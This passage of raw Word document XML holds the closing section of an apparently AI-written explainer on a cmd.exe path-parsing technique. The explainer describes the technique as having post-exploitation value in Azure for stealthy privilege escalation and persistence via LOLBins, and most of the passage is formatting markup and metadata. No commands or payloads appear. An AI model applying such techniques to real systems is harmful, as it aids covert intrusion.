        <w:t>spaces in path</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are parsed carefully – if resolved to a file, no argument split occurs. Only unresolved paths trigger argument splitting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718BA8AD" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This technique resembles </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>unquoted service path</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities in reverse – the </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>last resolved path wins</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, not the first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D2EF5C" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="1D3CBC0D">
          <v:rect id="_x0000_i1058" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="58354F4C" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102FFD44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 xml:space="preserve">This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>not a CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but rather a </w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>technique</w:t>
      </w:r>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with real-world post-exploitation value in Azure environments. It shows how deeply understanding command-line parsing in cmd.exe and LOLBin behavior can enable stealthy and creative privilege escalation or persistence methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C13C756" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="3E06F14D">
          <v:rect id="_x0000_i1059" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD2F978" w14:textId="77777777" w:rsidR="005469C0" w:rsidRPr="00893D3C" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00893D3C">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Would you like me to convert this into a Markdown or HTML-formatted cheat sheet for your playbook?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B95884" w14:textId="77777777" w:rsidR="005469C0" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E85BDAF" w14:textId="77777777" w:rsidR="005469C0" w:rsidRDefault="005469C0" w:rsidP="005469C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BFC403D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0DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7260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97EF6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0064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56C85"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DBF6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D4AE0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A4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967E7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA86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30678"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BF54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F29F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C25A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53AD4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DA8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F3D01"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0AB8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A7117"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="804C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F66AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D49C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D021E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA00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01C44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0A6C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F3DEA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="163A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D692E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C39A7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361298">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="662705130">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="772701287">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1572692033">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1969123362">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="333649428">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1154032131">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2126075645">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1696343949">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="786778662">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="283540475">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1377854385">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1929383035">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1104301853">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2539063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C0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178AD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469C0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2FE78"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2336807B-6BC8-47BC-A100-A4AD9A27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9C0"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:kern w:val="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78AD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78AD"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cstheme="majorBidi"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9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9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9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9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9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AD"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos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78AD"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
      <w:lang w:eastAsia="en-I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9C0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9C0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9C0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9C0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9C0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9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9C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5469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9C0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546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9C0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5469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2198</Words>
  <Characters>12533</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>104</Lines>
  <Paragraphs>29</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14702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2026-04-06T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T12:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>